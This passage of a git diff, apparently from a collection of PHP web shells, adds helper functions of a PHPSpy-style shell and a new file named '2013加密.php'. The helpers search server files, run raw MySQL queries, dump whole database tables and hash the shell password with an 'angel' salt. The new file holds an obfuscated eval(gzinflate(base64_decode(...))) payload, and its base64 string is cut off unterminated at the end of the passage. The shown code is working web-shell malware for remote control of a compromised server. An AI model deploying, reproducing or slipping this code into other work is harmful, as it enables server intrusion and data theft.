+					$filedata[$j]['filename']=str_replace($nowpath,'',$f);
+					$filedata[$j]['size']=sizecount(@filesize($f));
+					$filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$filedata[$j]['filechmod']=getChmod($f);
+					$filedata[$j]['fileperm']=getPerms($f);
+					$filedata[$j]['fileowner']=getUser($f);
+					$filedata[$j]['dirlink']=$dir;
+					$filedata[$j]['server_link']=$f;
+					$j++;
+				}
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $filedata;
+	} else {
+		return array();
+	}
+}
+
+function GetSFileList($dir, $content, $re = 0) {
+	global $filedata,$j,$nowpath, $writabledb;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$ext = getext($file);
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				GetSFileList($f, $content, $re = 0);
+			} elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
+				$find = 0;
+				if ($re) {
+					if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){
+						$find = 1;
+					}
+				} else {
+					if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) {
+						$find = 1;
+					}
+				}
+				if ($find) {
+					$filedata[$j]['filename']=str_replace($nowpath,'',$f);
+					$filedata[$j]['size']=sizecount(@filesize($f));
+					$filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$filedata[$j]['filechmod']=getChmod($f);
+					$filedata[$j]['fileperm']=getPerms($f);
+					$filedata[$j]['fileowner']=getUser($f);
+					$filedata[$j]['dirlink']=$dir;
+					$filedata[$j]['server_link']=$f;
+					$j++;
+				}
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $filedata;
+	} else {
+		return array();
+	}
+}
+
+function qy($sql) { 
+	//echo $sql.'<br>';
+	$res = $error = '';
+	if(!$res = @mysql_query($sql)) { 
+		return 0;
+	} else if(is_resource($res)) {
+		return 1; 
+	} else {
+		return 2;
+	}	
+	return 0;
+}
+
+function q($sql) { 
+	return @mysql_query($sql);
+}
+
+function fr($qy){
+	mysql_free_result($qy);
+}
+
+function sizecount($fileSize) {
+	$size = sprintf("%u", $fileSize);
+	if($size == 0) {
+		return '0 Bytes' ;
+	}
+	$sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');
+	return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i];
+}
+
+// ±¸·ÝÊý¾Ý¿â
+function sqldumptable($table, $fp=0) {
+
+	$tabledump = "DROP TABLE IF EXISTS `$table`;\n";
+	$res = q('SHOW CREATE TABLE `'.$table.'`');
+	$create = mysql_fetch_array($res);
+	$tabledump .= $create[1].";\n\n";
+
+	if ($fp) {
+		fwrite($fp,$tabledump);
+	} else {
+		echo $tabledump;
+	}
+	$tabledump = '';
+	$rows = q("SELECT * FROM $table");
+	while ($row = mysql_fetch_assoc($rows)) {
+		foreach($row as $k=>$v) {
+			$row[$k] = "'".@mysql_real_escape_string($v)."'";
+		}
+		$tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n";
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+	}
+	fr($rows);
+}
+
+function p($str){
+	echo $str."\n";
+}
+
+function tbhead() {
+	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+}
+function tbfoot(){
+	p('</table>');
+}
+
+function makehide($name,$value=''){
+	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+	!$arg['type'] && $arg['type'] = 'text';
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+	if ($arg['newline']) {
+		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
+	} else {
+		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
+	}
+}
+
+function makeselect($arg = array()){
+	if ($arg['onchange']) {
+		$onchange = 'onchange="'.$arg['onchange'].'"';
+	}
+	$arg['title'] = $arg['title'] ? $arg['title'] : '';
+	if ($arg['newline']) p('<p>');
+	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+		if (is_array($arg['option'])) {
+			if ($arg['nokey']) {
+				foreach ($arg['option'] as $value) {
+					if ($arg['selected']==$value) {
+						p("<option value=\"$value\" selected>$value</option>");
+					} else {
+						p("<option value=\"$value\">$value</option>");
+					}
+				}
+			} else {
+				foreach ($arg['option'] as $key=>$value) {
+					if ($arg['selected']==$key) {
+						p("<option value=\"$key\" selected>$value</option>");
+					} else {
+						p("<option value=\"$key\">$value</option>");
+					}
+				}
+			}
+		}
+	p("</select>");
+	if ($arg['newline']) p('</p>');
+}
+function formhead($arg = array()) {
+	global $self;
+	!$arg['method'] && $arg['method'] = 'post';
+	!$arg['action'] && $arg['action'] = $self;
+	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
+	!$arg['name'] && $arg['name'] = 'form1';
+	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
+	if ($arg['title']) {
+		p('<h2>'.$arg['title'].' &raquo;</h2>');
+	}
+}
+	
+function maketext($arg = array()){
+	!$arg['cols'] && $arg['cols'] = 100;
+	!$arg['rows'] && $arg['rows'] = 25;
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+	!$name && $name = 'submit';
+	p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
+	p('</form>');
+}
+
+function goback(){
+	global $self, $nowpath;
+	p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
+}
+
+function formfoot(){
+	p('</form>');
+}
+
+function encode_pass($pass) {
+	$pass = md5('angel'.$pass);
+	$pass = md5($pass.'angel');
+	$pass = md5('angel'.$pass.'angel');
+	return $pass;
+}
+
+function pr($s){
+	echo "<pre>".print_r($s).'</pre>';
+}
+
+?>
\ No newline at end of file
diff --git a/php/phpspy/2013加密.php b/php/phpspy/2013加密.php
new file mode 100644
index 0000000..41dc551
--- /dev/null
+++ b/php/phpspy/2013加密.php
@@ -0,0 +1,7 @@
+<?php
+
+$pass = 'ec38fe2a8497e0a8d6d349b3533038cb';
+
+eval(gzinflate(base64_decode('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